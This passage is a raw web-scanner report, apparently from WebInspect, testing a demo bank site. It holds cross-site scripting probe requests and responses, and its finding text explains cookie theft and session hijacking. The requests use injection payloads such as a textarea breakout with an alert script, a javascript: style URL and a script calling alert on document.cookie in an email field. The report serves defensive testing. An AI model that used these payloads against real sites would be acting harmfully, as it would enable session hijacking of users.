<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible TextArea Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This particular type takes place when input is returned embedded in the TEXTAREA paramaters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack></textarea><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)</script>GET /banklogin.asp?err=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4966
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>1"style="background:url(javascript:alert('XSS'))" "<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?err=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /test/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:25:33 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (test)<B>Found Directory:</B> /test/Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing Apache - Access Control</A>
<BR><BR><B>IIS:</B><BR><A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS Standard Permissions on Your Web Site</A>
<BR> <BR><B>Netscape:</B><BR><A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR><B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /join.asp?name=&email=test@<script>alert(document.cookie)</script>.com&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>test@<script>alert(document.cookie)</script>.com</attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)GET /_vti_bin/document.URL; HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_bin/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 401 Access Denied
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
Content-Length: 4431
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>You are not authorized to view this page</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->You are not authorized to view this page</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">You do not have permission to view this directory or page using the credentials you supplied.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
<li>If you believe you should be able to view this directory or page, please contact the Web site administrator by using the e-mail address or phone number listed on the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page.</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 401.2 - Unauthorized: Logon failed due to server configuration<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Background:<br>
This is usually caused by a server-side script not sending the proper WWW-Authenticate header field. Using Active Server Pages scripting this is done by using the <strong>AddHeader</strong> method of the <strong>Response</strong> object to request that the client use a certain authentication method to access the resource.
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=401.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li>
</p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_vti_bin/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /banklogin.asp?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4958
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>Invalid Login: 333-333-3333test@test999.com<br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
User supplied data without POSTThis policy states that any area of the website or web application that contains sensitive information or access to privileged functionality such as remote site administration requires any query string be reported as bad behavior. This also should require that the user send everything through a POST request. Webinspect has detected that the URL<B> ~FullURL~ </b>has failed this policy.GET <var name="path"/>?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/login1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
GET /banklogin.asp?err=Invalid%20Login%3A%20333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:21 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4958
Content-Type: text/html
Cache-control: private
Set-Cookie: sessionid=; path=/
Set-Cookie: state=; path=/
Set-Cookie: username=; path=/
Set-Cookie: userid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
